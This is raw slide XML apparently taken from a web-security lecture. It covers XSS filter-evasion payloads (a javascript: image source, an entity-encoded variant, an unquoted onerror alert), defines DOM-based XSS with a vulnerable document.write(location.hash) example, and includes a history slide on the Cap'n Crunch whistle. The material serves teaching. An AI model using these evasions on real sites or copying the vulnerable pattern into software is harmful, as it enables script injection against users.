              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>')&gt;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=j&amp;#X41vascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>')&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No quotes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;img%20src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>x.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>= alert(String(/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>adam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/).substring(1,5) )&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47058077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DOM-based XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also called third-order XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reflected: first-order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stored: second-order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I prefer the term Client-Side XSS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Because the bug is in the client side (aka JavaScript) code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As opposed to Server-Side XSS vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Where the bug is in the server-side code </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388837980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Client-Side XSS Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>location.hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>hello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> + name);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15208189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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE420DE5-5C86-C14D-AB75-39618C087816}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524290" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cap’n Crunch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524291" name="Rectangle 1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>In 1972 John Draper finds that the whistle that comes with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Cap’n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Crunch cereal produces a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>sound </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>at the 2600 Hz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> frequency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The 2600 frequency was used by AT&amp;T to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>authorize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>long-distance calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="524292" name="Picture 1028" descr="capncrunch"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="3576638"/>
            <a:ext cx="1843088" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="524293" name="Picture 1029"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="4039643"/>
            <a:ext cx="3657600" cy="1671638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133612433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242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2429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2429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242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Client-Side XSS Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http://example.com/test.html#adam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>location.hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
